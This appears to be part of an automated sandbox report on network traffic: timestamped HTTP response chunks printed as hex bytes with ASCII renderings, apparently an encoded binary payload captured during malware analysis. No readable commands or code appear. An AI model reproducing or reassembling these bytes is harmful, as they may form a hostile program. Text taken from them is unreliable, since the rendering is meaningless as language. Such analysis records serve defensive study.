                                2022-06-26 07:43:17 UTC658INData Raw: 15 66 9e 36 34 38 e7 35 25 b5 da 00 6d ce 1c 25 66 e5 da 00 69 ce 1c 25 66 e5 da 00 65 ce 1c 25 66 e5 da 00 61 ce 1c 25 66 e5 30 66 11 2c 2e 7b 66 ff 66 15 64 38 21 66 20 2d 5e 9d 21 25 99 f4 7b 66 20 2d 66 65 21 75 0d 18 68 da da 64 20 21 5e 58 21 25 50 de 64 38 21 66 20 21 83 36 34 38 9e b5 30 66 11 2c 8d 5d b4 65 25 0d 37 68 da da 64 20 21 30 df c9 f7 65 25 dd 6d b4 65 25 0d 82 da da da 34 7e d5 c2 1c 25 30 df f9 f7 65 25 dd 81 b4 65 25 0d 6c da da da 34 7e d9 c2 1c 25 30 df f9 f7 65 25 dd 89 b4 65 25 0d 56 da da da 34 7e dd c2 1c 25 30 df 05 f7 65 25 dd 91 b4 65 25 0d 40 da da da 34 7e e1 c2 1c 25 30 df 05 f7 65 25 dd 99 b4 65 25 0d 2a da da da 34 7e e5 c2 1c 25 30 df 05 f7 65 25 dd a1 b4 65 25 0d 14 da da da 34 7e e9 c2 1c 25 30 df 05 f7 65 25 dd a9
                                Data Ascii: f6485%m%fi%fe%fa%f0f,.{ffd8!f -^!%{f -fe!uhd !^X!%Pd8!f !6480f,]e%7hd !0e%me%4~%0e%e%l4~%0e%e%V4~%0e%e%@4~%0e%e%*4~%0e%e%4~%0e%
                                2022-06-26 07:43:17 UTC659INData Raw: 25 d9 5b 65 25 e5 5b 65 25 e9 5b 65 25 ed 5b 65 25 e1 5b 65 25 59 59 65 25 75 59 65 25 b1 59 65 25 f0 20 7b 3c 97 44 3c 93 99 79 54 95 40 1e 3c 4e 99 20 97 97 4a 97 66 e5 e1 01 65 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 e1 01 65 25 31 25 25 25 a1 52 65 25 d9 5b 65 25 e5 5b 65 25 e9 5b 65 25 ed 5b 65 25 e1 5b 65 25 59 59 65 25 75 59 65 25 b1 59 65 25 f0 20 7b 3c 97 44 3c 93 99 2a 9b 40 97 8b 91 4a 52 20 97 97 4a 97 66 e5 45 b8 65 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 45 b8 65 25 31 25 25 25 a1 52 65 25 d9 5b 65 25 e5 5b 65 25 e9 5b 65 25 ed 5b 65 25 e1 5b 65 25 59 59 65 25 75 59 65 25 b1 59 65 25 f2 20 7b 3c 97 44 3c 93 99 24 93 9b 3c 91 44 89 1c 97 42 20 97 97
                                Data Ascii: %[e%[e%[e%[e%[e%YYe%uYe%Ye% {<D<yT@<N Jfe%%%%%%%%%%%%%%%%%%%%%%%%%%%%%e%1%%%Re%[e%[e%[e%[e%[e%YYe%uYe%Ye% {<D<*@JR JfEe%%%%%%%%%%%%%%%%%%%%%%%%%%%%%Ee%1%%%Re%[e%[e%[e%[e%[e%YYe%uYe%Ye% {<D<$<DB
                                2022-06-26 07:43:17 UTC663INData Raw: 25 68 20 21 0d c2 34 da da 9e c4 94 71 da da c6 15 36 34 38 9e 68 65 25 30 66 11 8f 25 2e 66 fd 0e e5 30 8d 37 c8 65 25 89 da 55 89 64 45 68 20 21 0d d3 53 25 25 66 9e 66 30 21 0d e9 63 25 25 0e e5 7f 34 34 89 64 35 8d f4 c8 65 25 68 20 21 0d f2 2e da da 9e c4 48 71 da da c6 15 36 34 38 9e 68 65 25 30 66 11 8f 25 2e 66 fd 0e e5 30 8d 83 c8 65 25 89 da 55 89 64 45 68 20 21 0d 3f 61 25 25 66 9e 66 30 21 0d 2d 1a 25 25 0e e5 7f 34 34 89 64 35 8d 40 c8 65 25 68 20 21 0d f6 48 da da 9e c4 fc 71 da da c6 15 36 34 38 9e 68 65 25 30 66 11 8f 25 2e 66 fd 0e e5 30 8d cf c8 65 25 89 da 55 89 64 45 68 20 21 0d 27 16 25 25 66 9e 66 30 21 0d b5 63 25 25 0e e5 7f 34 34 89 64 35 8d 8c c8 65 25 68 20 21 0d aa 91 da da 9e c4 b0 26 da da c6 15 36 34 38 9e 68 65 25 2e 7b 32
                                Data Ascii: %h !4q648he%0f%.f07e%UdEh !S%%ff0!c%%44d5e%h !.Hq648he%0f%.f0e%UdEh !?a%%ff0!-%%44d5@e%h !Hq648he%0f%.f0e%UdEh !'%%ff0!c%%44d5e%h !&648he%.{2
                                2022-06-26 07:43:17 UTC667INData Raw: da 57 89 64 47 66 20 21 8b 66 25 ea 92 f5 5e 1f 39 ea 62 a6 dc 25 25 da 49 70 3a d8 65 25 8e d8 65 25 eb d8 65 25 ca d8 65 25 27 23 65 25 39 23 65 25 4f 23 65 25 65 23 65 25 81 23 65 25 97 23 65 25 35 da 65 25 fe da 65 25 60 23 65 25 1f 23 65 25 35 da 65 25 fe da 65 25 fe da 65 25 bd 23 65 25 86 23 65 25 9a 23 65 25 ae 23 65 25 0b 23 65 25 a2 20 15 25 25 25 25 a2 20 19 25 25 25 25 c4 8d de 25 25 a5 18 45 9e 1c 25 25 99 e8 8b df 39 25 8b dd dc 25 0d 01 07 da da a2 20 15 25 25 25 25 a2 20 19 25 25 25 25 c4 1a de 25 25 66 20 21 ea 9a 65 2d 74 64 20 15 64 30 19 c4 51 de 25 25 66 20 21 66 65 2d 74 64 20 15 64 30 19 c4 3f de 25 25 66 20 21 b4 65 2d 0d a0 0a da da 64 20 15 64 30 19 c4 29 de 25 25 66 20 21 b8 65 2d 0d 8a 0a da da 64 20 15 64 30 19 c4 13 27 25 25
                                Data Ascii: WdGf !f%^9b%%Ip:e%e%e%e%'#e%9#e%O#e%e#e%#e%#e%5e%e%`#e%#e%5e%e%e%#e%#e%#e%#e%#e% %%%% %%%%%%E%%9%% %%%% %%%%%%f !e-td d0Q%%f !fe-td d0?%%f !e-d d0)%%f !e-d d0'%%
                                2022-06-26 07:43:17 UTC671INData Raw: 1c 25 c8 31 1c 25 c8 31 1c 25 c8 31 1c 25 b3 31 1c 25 c9 31 1c 25 92 31 1c 25 ef 31 1c 25 bc 31 1c 25 0e e5 64 20 1d c4 de dc 25 25 a5 18 45 9e 1c 25 25 99 e8 8b df 29 25 8b dd dc 25 0d 9b f9 da da 0e e5 64 20 1d c4 be 25 25 25 66 20 21 ba 65 2d b4 38 1d 76 c4 f9 25 25 25 66 20 21 b6 65 2d b4 38 1d 76 c4 a0 25 25 25 66 20 21 66 65 2d 64 20 1d c4 92 25 25 25 66 20 21 ea 9a 65 2d 64 20 19 b6 20 19 b4 38 1d 76 c4 7c 25 25 25 66 20 21 ea e3 65 2d 64 20 19 b6 20 19 b4 38 1d 76 c4 66 25 25 25 66 20 21 ea db 65 2d 64 20 19 b6 20 19 b4 38 1d 76 c6 9d 66 20 21 ea 92 65 2d 64 20 19 b6 20 19 b4 38 1d 76 c6 40 66 20 21 66 65 2d 64 20 11 0e e5 64 20 15 ba 48 11 b4 38 1d 76 c6 73 66 20 21 ba 8d 2d b4 38 1d 76 c6 67 0e e5 30 8d ec e8 1c 25 89 da 55 89 64 45 66 20 21 0d
                                Data Ascii: %1%1%1%1%1%1%1%1%d %%E%%)%%d %%%f !e-8v%%%f !e-8v%%%f !fe-d %%%f !e-d 8v|%%%f !e-d 8vf%%%f !e-d 8vf !e-d 8v@f !fe-d d H8vsf !-8vg0%UdEf !
                                2022-06-26 07:43:17 UTC675INData Raw: 3c da da 66 30 1d 66 eb 0d 0f fe da da c4 c2 de 25 25 b4 1e 2d 5e e9 19 b6 61 49 76 68 20 19 0d 16 50 da da 66 30 19 66 eb 0d a4 fe da da c4 eb de 25 25 b8 1e 2d 5e e9 19 b6 61 49 76 68 20 15 0d 3f 50 da da 66 30 15 66 eb 0d cd fe da da c4 80 de 25 25 da 4e 31 da 4e 2d 68 20 11 0d ac d6 da da 66 30 11 66 eb 0d 9a 00 da da c4 ad de 25 25 da 4e 31 da 4e 2d 68 20 0d 0d 11 d6 da da 66 30 0d 66 eb 0d c7 00 da da c4 46 de 25 25 68 20 09 75 66 1e 2d 94 da da da 5a df dc 25 25 25 0d 5a 06 da da 66 30 09 66 eb 0d 58 00 da da c4 6b de 25 25 68 30 05 8b 66 1e 2d 0d 09 d6 da da 66 30 05 66 eb 0d 87 00 da da c4 06 de 25 25 68 30 01 ea e3 1e 2d 0d 64 85 da da 66 30 01 66 eb 0d ee fe da da c4 35 de 25 25 68 30 fd 0e e5 af 1e 2d 0d 48 85 da da 66 30 fd 66 eb 0d d2 47 da
                                Data Ascii: <f0f%%-^aIvh Pf0f%%-^aIvh ?Pf0f%%N1N-h f0f%%N1N-h f0fF%%h uf-Z%%%Zf0fXk%%h0f-f0f%%h0-df0f5%%h0-Hf0fG
                                2022-06-26 07:43:17 UTC679INData Raw: 25 25 1e 50 97 97 40 93 3e 54 25 25 25 25 da da da da 29 25 25 25 69 3c 99 40 25 25 25 25 da da da da 2b 25 25 25 2a 91 40 2e 99 97 25 25 da da da da 2d 25 25 25 69 44 4e 95 3c 99 3e 8d 25 25 25 25 da da da da e0 25 25 25 20 97 97 4a 97 25 25 25 da da da da e2 25 25 25 67 4a 4a 91 40 3c 93 25 da da da da e2 25 25 25 7b 3c 97 44 3c 93 99 25 da da da da e2 25 25 25 30 93 46 93 4a 52 93 25 da da da da e2 25 25 25 69 40 3e 44 48 3c 91 25 da da da da de 25 25 25 49 55 6b 25 da da da da 2d 25 25 25 2e 8d 4a 97 99 24 93 99 25 25 25 25 da da da da 29 25 25 25 67 54 99 40 25 25 25 25 da da da da 29 25 25 25 32 4a 97 89 25 25 25 25 da da da da 2d 25 25 25 71 4a 93 42 32 4a 97 89 25 25 25 25 da da da da e0 25 25 25 24 93 99 5b 59 25 25 25 30 66 11 5c e9 1d d8 da da
                                Data Ascii: %%P@>T%%%%)%%%i<@%%%%+%%%*@.%%-%%%iDN<>%%%%%%% J%%%%%%gJJ@<%%%%{<D<%%%%0FJR%%%%i@>DH<%%%%IUk%-%%%.J$%%%%)%%%gT@%%%%)%%%2J%%%%-%%%qJB2J%%%%%%%$[Y%%%0f\
                                2022-06-26 07:43:17 UTC683INData Raw: 99 2d 68 30 d1 0d fe de 25 25 66 38 15 60 b6 99 41 26 68 d9 b8 d1 d8 da da 66 a3 29 60 da 99 e4 66 b2 66 2b 0d 0d 35 da da 60 b6 50 09 0e e5 7f 34 34 89 64 35 8d 0f 18 1c 25 66 38 15 60 b6 99 37 26 66 a9 b8 d1 d8 da da 75 0d fb 1b da da 60 b6 50 13 9e c4 c1 d6 23 da c6 ba 0e e5 7f 34 34 89 64 35 8d e8 63 1c 25 68 20 d1 66 f0 95 59 1c 25 0d f6 31 da da 9e c4 54 d6 23 da c6 0f 3a 83 36 66 c0 38 e7 2d 25 66 e5 30 66 11 5e e9 1d 66 20 2d 66 65 21 64 20 1d eb 20 21 2b 68 20 1d 75 8f 25 66 e8 e5 aa 1c 25 d7 dc 7c 85 10 1c 25 0d 44 9b da da 0d 99 d6 23 da 34 34 38 9e 30 66 11 5e e9 05 2e 7b 32 64 28 19 64 30 21 64 20 09 68 58 05 66 20 21 64 e2 0e 1b 64 40 1d 66 20 19 65 9c 05 27 04 e9 68 20 15 64 45 66 e2 0d ad 6b da da 66 fd 8f 25 8f 25 2e 66 e2 75 8f 25 8f 25
                                Data Ascii: -h0%%f8`A&hf)`ff+5`P44d5%f8`7&fu`P#44d5c%h fY%1T#:6f8-%f0f^f -fe!d !+h u%f%|%D#4480f^.{2d(d0!d hXf !dd@f e'h dEfkf%%.fu%%
                                2022-06-26 07:43:17 UTC687INData Raw: 50 95 4e b5 30 66 11 2c 2e 7b 32 a9 f7 99 2d 5e e9 15 0d a0 0d 23 da 66 d4 ad 30 da 66 fd 0e f7 66 9e 0d 0c 0b 23 da d7 dc 7c 59 6d 1c 25 0d 00 0b 23 da 64 1e 29 d7 dc 7c 19 6f 1c 25 0d 3b 0b 23 da 64 1e 2d d7 dc 7c 59 6d 1c 25 0d e2 0b 23 da 66 15 64 4e 31 66 eb 66 b2 0d a4 27 25 25 66 9e a5 58 da 25 99 ea 0d ed 0d 23 da 89 6a e0 25 25 25 25 5e e9 31 66 9e 3a 83 36 34 38 9e 66 e5 2e 7b 0d 98 0d 23 da 66 ff 66 15 66 ae a5 07 21 66 eb 0d bc c0 23 da 66 6b 29 0d c4 c0 23 da 66 6b 2d 0d bc c0 23 da 66 6b 31 0d b4 c0 23 da a9 b6 a3 e2 66 eb 0d 97 0d 23 da 83 36 9e 68 65 25 2e 7b 66 ff 66 15 60 b6 99 35 66 eb 0d 86 29 da da 16 fd 99 e0 0e e5 83 36 9e d5 dc 83 36 9e b5 2e 7b 32 66 1f 66 15 66 6b 31 66 7d 2d 26 5e d6 25 a1 00 66 ae 66 6b 31 0d 46 de 25 25 66 b2
                                Data Ascii: PN0f,.{2-^#f0ff#|Ym%#d)|o%;#d-|Ym%#fdN1ff'%%fX%#j%%%%^1f:648f.{#fff!f#fk)#fk-#fk1#f#6he%.{ff`5f)66.{2fffk1f}-&^%ffk1F%%f
                                2022-06-26 07:43:17 UTC692INData Raw: 35 8d 8a 83 1c 25 66 20 21 0d d0 b0 23 da 9e c4 b2 ff 23 da c6 15 83 34 38 9e b5 30 66 11 5e e9 1d 2e 7b 0e a4 64 28 1d 66 ff 64 20 21 0e e5 30 8d 2c 3a 1c 25 89 da 55 89 64 45 66 20 21 0d 61 d4 da da 0e e5 30 8d 59 3a 1c 25 89 da 55 89 64 45 66 9e 66 35 da 37 66 15 66 9e 0d 2a e6 25 25 06 15 68 20 1d 66 f3 0e f7 0d ec 07 23 da 66 30 1d 66 f3 66 9e 66 3d da 2e 31 66 30 1d 66 20 21 66 2d da 2c 51 0e e5 7f 34 34 89 64 35 8d 16 3a 1c 25 66 20 21 0d 7c d4 da da 9e c4 26 ff 23 da c6 15 0e e5 7f 34 34 89 64 35 8d 7d 3a 1c 25 68 20 1d 0d fd 05 23 da 9e c4 53 ff 23 da c6 15 83 36 34 34 38 9e 66 e5 30 66 11 5e e9 1d 2e 7b 32 0e b6 64 38 1d 66 cc 66 ff 64 20 21 0e e5 30 8d dc 85 1c 25 89 da 55 89 64 45 16 ce 99 89 66 20 21 0d 64 1d da da 0e e5 30 8d 09 3a 1c 25 89
                                Data Ascii: 5%f !##480f^.{d(fd !0,:%UdEf !a0Y:%UdEff57ff*%%h f#f0fff=.1f0f !f-,Q44d5:%f !|&#44d5}:%h #S#6448f0f^.{2d8ffd !0%UdEf !d0:%
                                2022-06-26 07:43:17 UTC696INData Raw: 30 1d 64 20 21 5e 18 b1 0d 1c 25 25 ea a9 ab 25 25 25 7c b1 0d 1c 25 0d 4b c0 da da 66 1d 0e e5 30 8d 8a 4a 1c 25 89 da 55 89 64 45 66 3a 2d 26 5e d6 25 a1 69 66 ae 66 a2 0d 45 be da da 66 15 5e 58 21 25 99 2d 66 6b 2d 16 20 21 50 00 5e 58 1d 25 99 ea 66 7b 35 66 20 1d 0d fe e8 da da a9 e5 99 35 66 ae 66 a2 0d 23 bc da da 66 eb 0d e6 a0 23 da 26 5e d6 da 50 e1 0e e5 7f 34 34 89 64 35 8d db 4a 1c 25 7c b1 0d 1c 25 0d eb 09 da da 9e c4 f5 a4 23 da c6 13 3a 83 36 34 34 38 9e 68 65 25 30 66 11 2c 2e 7b 32 64 20 21 5e 18 b1 0d 1c 25 25 99 46 7c b1 0d 1c 25 0d 5e 09 da da 66 1d 0e e5 30 8d 12 95 1c 25 89 da 55 89 64 45 66 3a 2d 26 5e d6 25 a1 04 66 ae 66 a2 0d 58 07 da da 66 15 66 6b 29 16 20 21 50 35 66 ae 66 a2 0d 9b bc da da 66 eb 0d 5e e9 23 da 26 5e d6 da
                                Data Ascii: 0d !^%%%%%|%Kf0J%UdEf:-&^%iffEf^X!%-fk- !P^X%f{5f 5ff#f#&^P44d5J%|%#:6448he%0f,.{2d !^%%F|%^f0%UdEf:-&^%ffXffk) !P5fff^#&^
                                2022-06-26 07:43:17 UTC700INData Raw: c6 c6 66 20 21 83 36 66 c0 38 9e 66 e5 2e 7b 32 5e e9 1d 66 cc 66 1f 66 fd 8f 65 8d 25 55 25 25 7b 8f 25 2e 0d 79 c0 23 da 64 29 49 68 69 49 29 75 7b 32 66 69 49 31 75 2e 0d 5a c0 23 da 66 29 49 34 7f 3a 83 36 9e 66 e5 30 66 11 5e e9 15 2e 7b 32 66 d4 66 17 66 fd 66 28 31 66 b2 66 9e 0d 84 da da da 64 20 1d 66 eb 0d b2 23 da da 66 ed 66 fb 66 9e 0d b9 da da da 64 20 21 68 20 15 75 8f 25 66 20 1d 75 66 20 21 75 8f 25 8f 25 2e 0d 2c be 23 da 66 15 a5 58 2d 25 99 f6 8f da 7b 0d dc c0 23 da 68 20 19 75 66 20 31 75 32 66 20 1d 75 2e 0d a3 09 23 da 66 eb 3a 83 36 66 c0 38 e7 2d 25 68 65 25 2e 7b 32 30 5c e9 f5 23 da da 66 0f 66 1d 0e b6 8f 65 8d 25 35 25 25 8d fe dc 25 25 8f 25 32 0d b9 09 23 da 64 29 49 5e 61 49 25 ea a9 84 25 25 25 66 29 49 eb 69 49 31 8d 68
                                Data Ascii: f !6f8f.{2^fffe%U%%{%.y#d)IhiI)u{2fiI1u.Z#f)I4:6f0f^.{2ffff(1ffd f#fffd !h u%f uf !u%%.,#fX-%{#h uf 1u2f u.#f:6f8-%he%.{20\#ffe%5%%%%%2#d)I^aI%%%%f)IiI1h
                                2022-06-26 07:43:17 UTC703INData Raw: e9 19 2e 7b 32 0e b6 64 38 19 66 d4 64 30 1d 64 20 21 66 20 21 0d e3 dd 23 da 66 20 1d 0d db dd 23 da 0e e5 30 8d a8 b1 1c 25 89 da 55 89 64 45 0e 1b 68 20 19 66 30 21 0d 5e d9 23 da 66 20 19 0d 7e db 23 da 75 66 a2 94 dc 25 25 25 66 f0 d5 ad 1c 25 0d e1 eb 23 da 5e e9 29 66 30 19 66 20 1d 0d 8f 94 23 da 66 fd 26 5e d6 da 50 ea 66 e2 68 29 d5 66 30 19 0d dc d9 23 da c6 10 66 e2 68 29 d5 75 66 a6 df dc 25 25 25 66 20 19 0d db dd 23 da 66 20 1d 0d 73 db 23 da 66 ed de a6 68 20 19 df dc 25 25 25 0d b8 dd 23 da 6b 5e 58 19 25 50 84 0e e5 7f 34 34 89 64 35 8d f9 b1 1c 25 68 20 19 df de 25 25 25 0d a5 8e 23 da 9e c4 d7 d1 23 da c6 c6 3a 83 36 66 c0 38 9e b5 2e 7b 32 30 2c 66 c4 66 ff 64 29 49 68 4e dc 66 fb 66 a0 0d 49 94 23 da 73 60 1b a1 f6 6b 0e da 66 41 49
                                Data Ascii: .{2d8fd0d !f !#f #0%UdEh f0!^#f ~#uf%%%f%#^)f0f #f&^Pfh)f0#fh)uf%%%f #f s#fh %%%#k^X%P44d5%h %%%##:6f8.{20,ffd)IhNffI#s`kfAI
                                2022-06-26 07:43:17 UTC707INData Raw: 25 df f1 d7 1c 25 0d 11 7e 23 da da 10 59 c4 1c 25 da 10 41 c4 1c 25 da 10 25 c4 1c 25 8d 05 d7 1c 25 68 60 99 da da da df 29 25 25 25 0d cc cb 23 da 66 60 99 da da da 0d 4b cd 23 da 75 0d 05 a2 23 da 7e ed 0d 1c 25 da 10 71 c4 1c 25 8d 11 d7 1c 25 da 10 5d c4 1c 25 8d 21 d7 1c 25 da 10 f5 0d 1c 25 68 60 95 da da da df e0 25 25 25 0d 8a cb 23 da 66 60 95 da da da 0d 09 82 23 da 75 7c ed 0d 1c 25 75 0d 7d a2 23 da 7e dd 0d 1c 25 df 6d 3e 65 25 dd dd 0d 1c 25 0d f9 11 da da 7c ed 0d 1c 25 75 0d 9c eb 23 da dd 59 c4 1c 25 df 31 8e 1c 25 0d 63 7e 23 da dd 41 c4 1c 25 df 3d 8e 1c 25 0d 0a 7e 23 da dd 25 c4 1c 25 df 49 8e 1c 25 0d 45 7e 23 da dd 5d c4 1c 25 df 55 8e 1c 25 0d ec 7e 23 da dd 71 c4 1c 25 df 65 8e 1c 25 0d 27 7e 23 da dd f5 0d 1c 25 df 71 8e 1c 25
                                Data Ascii: %%~#Y%A%%%%h`)%%%#f`K#u#~%q%%]%!%%h`%%%#f`#u|%u}#~%m>e%%|%u#Y%1%c~#A%=%~#%%I%E~#]%U%~#q%e%'~#%q%
                                2022-06-26 07:43:17 UTC711INData Raw: 1c 25 7c ed 0d 1c 25 75 0d 2c 92 23 da 7e dd 0d 1c 25 df 4d 3e 65 25 dd dd 0d 1c 25 0d a8 01 da da 8d e5 db 1c 25 7c ed 0d 1c 25 75 0d 08 92 23 da 7e dd 0d 1c 25 df 4d 3e 65 25 dd dd 0d 1c 25 0d 84 01 da da 7c ed 0d 1c 25 75 0d bb db 23 da dd 59 c4 1c 25 df 09 db 1c 25 0d ee 6e 23 da 68 60 99 d8 da da 94 f9 8e 1c 25 66 f0 59 c4 1c 25 0d 90 70 23 da 66 60 99 d8 da da 0d 83 72 23 da 66 f5 68 60 9d d8 da da 0d 64 b9 23 da 66 60 9d d8 da da df 25 a5 25 25 0d cc 43 da da 7e ed 0d 1c 25 8d 0d db 1c 25 7c ed 0d 1c 25 75 0d d1 db 23 da 7e dd 0d 1c 25 df 4d 3e 65 25 dd dd 0d 1c 25 0d 4d 01 da da 8d 21 db 1c 25 7c ed 0d 1c 25 75 0d ad db 23 da 7e dd 0d 1c 25 df 4d 3e 65 25 dd dd 0d 1c 25 0d 29 01 da da 8d 31 92 1c 25 7c ed 0d 1c 25 75 0d 89 db 23 da 7e dd 0d 1c 25
                                Data Ascii: %|%u,#~%M>e%%%|%u#~%M>e%%|%u#Y%%n#h`%fY%p#f`r#fh`d#f`%%%C~%%|%u#~%M>e%%M!%|%u#~%M>e%%)1%|%u#~%
                                2022-06-26 07:43:17 UTC715INData Raw: 1c 25 a9 25 a9 25 25 25 a5 2d 25 2d 25 2d 25 2d 25 2d 25 2d 25 2d 25 2d 25 25 39 25 39 25 39 25 39 dc a9 67 a9 dc 2b 67 2b 25 41 25 41 25 25 25 39 e2 a5 22 a5 e2 27 22 27 25 25 25 25 25 25 25 25 25 25 25 25 2d 25 2d 25 25 25 25 25 25 25 25 25 25 25 25 25 35 1c c5 dc 3d dc 45 dc 09 45 09 45 da da 25 25 25 25 25 25 25 25 25 25 da da da da da da 35 dc 25 25 08 e0 1a 25 1a 27 1a 25 1a 27 1a 25 1a 25 1a 25 1a 27 35 dc da da da da da da da da da da da da da da fe 65 fe 65 fe 27 fe 27 da da da da da da da da 1a 25 1a 27 0a 25 1a 27 18 25 18 25 1a 25 1a 25 25 25 25 a5 25 a5 25 a5 25 25 25 25 da da da da da da da da da da da da da da da da da da da da 09 45 09 45 09 45 09 45 09 45 09 45 09 45 09 45 09 45 09 45 09 45 09 45 09 45 09 45 09 45 09 45 02 67 1a 25 1a 25
                                Data Ascii: %%%%%-%-%-%-%-%-%-%-%%9%9%9%9g+g+%A%A%%%9"'"'%%%%%%%%%%%%-%-%%%%%%%%%%%%%5=EEE%%%%%%%%%%5%%%'%'%%%'5ee''%'%'%%%%%%%%%%%%%EEEEEEEEEEEEEEEEg%%
                                2022-06-26 07:43:17 UTC719INData Raw: 25 25 71 4a 3e 3c 91 1c 91 91 4a 3e 25 25 25 25 22 40 99 79 44 3e 46 1e 4a 50 93 99 25 25 25 25 2c 50 40 97 54 75 40 97 8b 4a 97 48 3c 93 3e 40 1e 4a 50 93 99 40 97 25 25 25 22 40 99 7b 40 97 4e 44 4a 93 25 25 25 25 22 40 99 1e 50 97 97 40 93 99 79 8d 97 40 3c 89 24 89 25 25 25 25 24 93 99 40 97 91 4a 3e 46 40 89 69 40 3e 97 40 48 40 93 99 25 25 25 25 24 93 99 40 97 91 4a 3e 46 40 89 24 93 3e 97 40 48 40 93 99 25 25 25 25 7b 44 97 99 50 3c 91 2c 50 40 97 54 25 25 25 25 32 44 89 40 1e 8d 3c 97 79 4a 28 50 91 99 44 67 54 99 40 25 25 25 28 50 91 99 44 67 54 99 40 79 4a 32 44 89 40 1e 8d 3c 97 25 25 25 91 4e 99 97 91 40 93 1c 25 25 25 25 91 4e 99 97 3e 95 54 93 1c 25 25 25 71 4a 3c 89 71 44 87 97 3c 97 54 20 9d 1c 25 25 25 25 22 40 99 79 8d 97 40 3c 89 71 4a
                                Data Ascii: %%qJ><J>%%%%"@yD>FJP%%%%,P@Tu@JH<>@JP@%%%"@{@NDJ%%%%"@P@y@<$%%%%$@J>F@i@>@H@%%%%$@J>F@$>@H@%%%%{DP<,P@T%%%%2D@<yJ(PDgT@%%%(PDgT@yJ2D@<%%%N@%%%%N>T%%%qJ<qD<T %%%%"@y@<qJ
                                2022-06-26 07:43:17 UTC724INData Raw: 59 f5 59 f9 59 fd 59 01 59 05 59 09 59 0d 59 11 59 21 59 41 10 49 10 4d 10 51 10 55 10 59 10 5d 10 61 10 65 10 69 10 7d 10 9d 10 a5 10 a9 10 ad 10 b1 10 b5 10 b9 10 bd 10 c1 10 c5 10 d9 10 f9 10 01 10 05 10 09 10 0d 10 11 10 15 10 19 10 1d 10 21 10 35 5b 55 5b 5d 5b 61 5b 65 5b 69 5b 6d 5b 71 5b 75 5b 79 5b 7d 5b 95 5b b5 5b bd 5b c1 5b c5 5b c9 5b cd 5b d1 5b d5 5b d9 5b dd 5b ed 5b 0d 5b 15 5b 19 5b 1d 5b 21 5b 25 12 29 12 2d 12 31 12 35 12 49 12 69 12 71 12 75 12 79 12 7d 12 81 12 85 12 89 12 8d 12 91 12 a1 12 c1 12 c9 12 cd 12 d1 12 d5 12 d9 12 dd 12 e1 12 e5 12 e9 12 fd 12 1d 12 25 5d 29 5d 2d 5d 31 5d 35 5d 39 5d 3d 5d 41 5d 45 5d 5d 5d 7d 5d 85 5d 89 5d 8d 5d 91 5d 95 5d 99 5d 9d 5d a1 5d a5 5d b9 5d d9 5d e1 5d e5 5d e9 5d ed 5d f1 5d f5 5d f9 5d
                                Data Ascii: YYYYYYYYY!YAIMQUY]aei}!5[U[][a[e[i[m[q[u[y[}[[[[[[[[[[[[[[[[[![%)-15Iiquy}%])]-]1]5]9]=]A]E]]]}]]]]]]]]]]]]]]]]]]]
                                2022-06-26 07:43:17 UTC728INData Raw: e9 14 f5 14 f9 14 09 14 11 14 15 14 19 14 1d 14 21 14 25 5f 29 5f 2d 5f 31 5f 35 5f 39 5f 3d 5f 41 5f 45 5f 49 5f 4d 5f 51 5f 55 5f 59 5f 5d 5f 61 5f 65 5f 69 5f 6d 5f 71 5f 75 5f 79 5f 7d 5f 81 5f 85 5f 89 5f 8d 5f 91 5f 95 5f 99 5f 9d 5f a1 5f a5 5f a9 5f ad 5f b1 5f bf 5f d1 5f df 5f e3 5f f5 5f c4 5f 19 5f 29 16 39 16 41 16 45 16 49 16 4d 16 51 16 55 16 59 16 5d 16 61 16 65 16 69 16 6d 16 71 16 75 16 79 16 7d 16 81 16 85 16 89 16 8d 16 91 16 95 16 99 16 9d 16 a1 16 a5 16 a9 16 ad 16 b1 16 b5 16 b9 16 bd 16 c1 16 c5 16 c9 16 cd 16 d1 16 d5 16 d9 16 dd 16 e1 16 e5 16 e9 16 ed 16 f1 16 f5 16 f9 16 09 16 d0 16 d4 16 31 61 51 61 59 61 5d 61 61 61 65 61 69 61 6d 61 71 61 75 61 79 61 7d 61 81 61 85 61 89 61 8d 61 91 61 95 61 a1 61 c1 61 c9 61 cd 61 d1 61 d5
                                Data Ascii: !%_)_-_1_5_9_=_A_E_I_M_Q_U_Y_]_a_e_i_m_q_u_y_}_____________________)9AEIMQUY]aeimquy}1aQaYa]aaaeaiamaqauaya}aaaaaaaaaaaa
                                2022-06-26 07:43:17 UTC732INData Raw: 4e ac 99 59 ea 38 a5 bb c7 46 ac 3f d9 43 18 a5 db c7 82 ac 26 0d 50 99 25 58 af b3 3e a5 ac 0c 33 8b b1 b4 3c 81 b1 62 20 85 64 7d 3f 4b a2 3b 3e c0 7d 10 7b 6a 10 3e f8 7d 12 9b f0 f6 e5 c3 3c ca 2d 49 27 66 a5 ee 11 2d 83 a9 35 e7 91 a7 b5 b5 22 7d 71 7d 1e cd 00 11 fe d9 37 df 2d 32 e4 5e a9 0c e7 02 47 6e cd 2a d9 00 9f 37 d4 e9 9d 87 5f 8c b5 7d 6b d1 4b 13 fc 43 fc c3 00 83 02 33 ee 3a 6e 6d 49 33 a4 b7 09 73 2f fc 00 b5 57 24 e6 24 46 6d b6 6d 08 c9 2e c9 63 f7 35 44 c1 71 4b c6 b5 48 a4 03 09 2d d7 a5 d1 45 72 6c 92 b5 ea b5 2a b7 d6 a4 9e 09 92 39 5f a0 ad 07 71 e4 c7 49 77 c9 b9 37 6f 10 40 1a c0 29 80 7a 57 67 74 c5 cf 2c a8 84 c3 f9 2d cf ad 5f 7a 7f 24 48 c5 9b 75 0a 2e 62 84 ee 59 50 bf 00 a8 76 3b 1e a6 c9 08 7e b0 f5 bf 44 42 44 d2 8d 0a
                                Data Ascii: NY8F?C&P%X>3<b d}?K;>}{j>}<-I'f-5"}q}7-2^Gn*7_}kKC3:nmI3s/W$$Fmm.c5DqKH-Erl*9_qIw7o@)zWgt,-_z$Hu.bYPv;~DBD
